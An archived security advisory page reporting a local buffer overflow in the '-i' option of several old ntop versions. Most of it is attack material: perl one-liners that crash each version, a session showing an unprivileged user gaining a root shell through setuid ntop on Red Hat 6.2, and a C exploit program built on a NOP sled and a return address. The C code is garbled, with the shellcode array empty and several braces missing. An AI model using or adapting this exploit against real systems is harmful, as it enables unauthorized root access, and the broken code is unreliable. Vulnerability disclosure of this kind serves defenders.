Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: ntop3-2.htm

Ntop Exploitable Buffer Overflow



    ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2


    Christophe  Bailleux  found  following.   All  ntop  versions  are
    vulnerabled to local buffer  overflow attack in there  -i options.
    Ntop must be owned by root  with a setuid bit for the  attacker to
    gain root privileges.

    a) ntop 1.1

        tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
        ntop v.1.1 MT [i686-pc-linux-gnu] listening on AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

        Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP
        Segmentation fault

    b) ntop 1.2a7

        tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
        Segmentation fault

    c) ntop 1.3.1

        tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
        Segmentation fault

    d) ntop 1.3.2

        tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

        24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build)
        24/Oct/2000:12:32:16 Listening on
        24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <>
        24/Oct/2000:12:32:16 Get the freshest ntop from
        24/Oct/2000:12:32:16 Initialising...
        Segmentation fault

    Exploit was tested on redhat 6.2 (Zoot) where ntop is installed by
    default with the bit setuid root

        [cb@nux cb]$ cat /etc/redhat-release
        Red Hat Linux release 6.2 (Zoot)
        [cb@nux cb]$ rpm -qf /sbin/ntop
        [cb@nux cb]$ id
        uid=535(cb) gid=535(cb) groups=535(cb)
        [cb@nux cb]$ ./expl

        ntop v.1.1 MT [i586-pc-linux-gnu] listening on

        Host        Act   -Rcvd-      Sent    TCP   UDP ICMP
        bash# id
        uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
        bash# exit
        [cb@nux cb]$


    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>
    #define LEN 208
    int main (int argc, char **argv)
      char buf[LEN + 12];
      int  ret = 0xbffffba0;
      int  *p;
      char code[]=
      if (argc > 1) {
        ret += atoi(argv[1]);
        fprintf(stderr, "Using ret %#010x\n", ret);
      memset(buf, '\x90', LEN);
      memcpy(buf + LEN - strlen(code), code, strlen(code));
      p = (int *) (buf + LEN);
      *p++ = ret;
      *p++ = ret;
      *p   = 0;
     execl("./ntop", "ntop", "-i", buf, NULL);


    Upgrade to latest version.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH